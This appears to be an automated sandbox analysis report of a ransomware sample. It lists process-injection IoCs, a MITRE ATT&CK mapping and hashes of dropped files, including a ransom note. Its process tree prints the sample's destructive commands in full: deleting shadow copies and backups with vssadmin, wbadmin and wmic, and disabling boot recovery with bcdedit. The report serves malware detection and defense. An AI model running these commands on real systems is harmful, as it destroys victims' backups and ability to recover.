Token: SeBackupPrivilege	1740	WMIC.exe
Token: SeRestorePrivilege	1740	WMIC.exe
Token: SeShutdownPrivilege	1740	WMIC.exe
Token: SeDebugPrivilege	1740	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1740	WMIC.exe
Token: SeRemoteShutdownPrivilege	1740	WMIC.exe
Token: SeUndockPrivilege	1740	WMIC.exe
Token: SeManageVolumePrivilege	1740	WMIC.exe
Token: 33	1740	WMIC.exe
Token: 34	1740	WMIC.exe
Token: 35	1740	WMIC.exe
Token: 36	1740	WMIC.exe
Token: SeBackupPrivilege	436	vssvc.exe
Token: SeRestorePrivilege	436	vssvc.exe
Token: SeAuditPrivilege	436	vssvc.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2660 wrote to memory of 1096	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	86
PID 2660 wrote to memory of 1096	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	86
PID 2660 wrote to memory of 1096	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	86
PID 2660 wrote to memory of 5116	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	88
PID 2660 wrote to memory of 5116	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	88
PID 2660 wrote to memory of 5116	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	88
PID 2660 wrote to memory of 2900	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	90
PID 2660 wrote to memory of 2900	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	90
PID 2660 wrote to memory of 2900	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	90
PID 2660 wrote to memory of 864	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	92
PID 2660 wrote to memory of 864	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	92
PID 2660 wrote to memory of 864	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	92
PID 2660 wrote to memory of 1228	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	94
PID 2660 wrote to memory of 1228	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	94
PID 2660 wrote to memory of 1228	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	94
PID 2660 wrote to memory of 4084	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	96
PID 2660 wrote to memory of 4084	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	96
PID 2660 wrote to memory of 4084	2660	2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe	96
PID 864 wrote to memory of 1740	864	cmd.exe	98
PID 864 wrote to memory of 1740	864	cmd.exe	98
PID 864 wrote to memory of 1740	864	cmd.exe	98

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\2f2d4eb24662c916f822f9c3fd55c9b2_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2660
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "vssadmin delete shadows /all /quiet"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1096
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5116
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "wbadmin DELETE BACKUP -keepVersions:0"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2900
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "wmic SHADOWCOPY DELETE"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:864
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1740
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1228
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4084

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-3756129449-3121373848-4276368241-1000\desktop.ini

Filesize
930B

MD5
037bde8503b7c50bbe61f66d9606dc96

SHA1
62a27b7e2fa9c59f971a05aa3ccccf12587f84a0

SHA256
9e9ac2f311c6997e18f6632d0426cd0abaabe2c5c78ac20b0d97f09a7f383907

SHA512
cee08aa4b0e2f74da4ae3aa419474694ac751d986f61f791fc8fc3f9c36c0fb5b766a624a5ed1b4e383f2e3e3190acc33d4c8c7846faf794124894438621ee2d

Download Submit
C:\$Recycle.Bin\S-1-5-21-3756129449-3121373848-4276368241-1000\desktop.ini

Filesize
930B

MD5
60b24c3d605579cf8d74a971616ce5ae

SHA1
0d1ed44a7abe1b542da7cdf84d8c92002515ae7f

SHA256
a4b80692a0aa04dbb38c1400f3126d2abc31b42ca52ea447b5e99b9c7514c178

SHA512
3c92ad3d7c43d3291c5e5f767c1830d13ce857599ed009333ba0e7b0ad8d55e3cd5af14af6924560dc8cb7785149c2546fe4605fdc6cc4f97e26eb4bbcb6f64c

Download Submit
C:\$Recycle.Bin\S-1-5-21-3756129449-3121373848-4276368241-1000\how_to_decrypt.hta

Filesize
13KB

MD5
445a690e398a932f4f19f69aa6124e42

SHA1
5a2c3c974ca6a493343c7671dd0fb88ca1a660c8

SHA256
a6f3076e747b5fecec0333343727f90f18b935b1490a3762343e894843defedf

SHA512
87451f0b2c0d6cd3b422685be17ccd477556f70e02b6dac8138e409ba77ea7981f8f6198deda31e92ba65fae8ffbb01e4aa21c21b8632c59c91cc18cf0cf6ce0

Download Submit
C:\Users\Admin\AppData\Local\Temp\c-1728514901.log

Filesize
1KB

MD5
1952fcae56d7c1ab501a8b46d54aad61

SHA1
874a08112af7b5ac89cb3c4c07ee116d460f592a

SHA256
f7dc958d9cc4b24f805651470d142cbbbde192baed19cbe5e360b33ec90bf876

SHA512
50afb0374ea784860704c9e32f39541cf10f20ae8a0333eb28a4d4dcbd637f086aba59ba96eee0506cfe5f1eca1f0c250bfad5a70d2616375acb8384c4f50d66

Download Submit
C:\Users\Admin\AppData\Local\Temp\c-1728514901.log

Filesize
4KB

MD5
5e6e6ca394fcae71f3440dda3df3b1b1

SHA1
d8cd1f29a6b824da9afc072d3c337e9befa2e617

SHA256
3b0ded10caafe51194b218dafd90d4894c44d47e9eab137c8c1c1e4f7a95895b

SHA512
18aa1ea847ca271a8e6dc7e940b3721b9236c06159932bb675a90586afd3eb73d69a56071d4b45fba5f2d9ce35b760ce1dd848cee6ba1a8b6d8ea93534871694

Download Submit
memory/2660-5753-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2660-6635-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2660-68-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2660-1-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2660-10-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2660-6544-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2660-6581-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2660-5422-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2660-6765-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2660-6766-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2660-9-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2660-6771-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2660-7014-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2660-7015-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download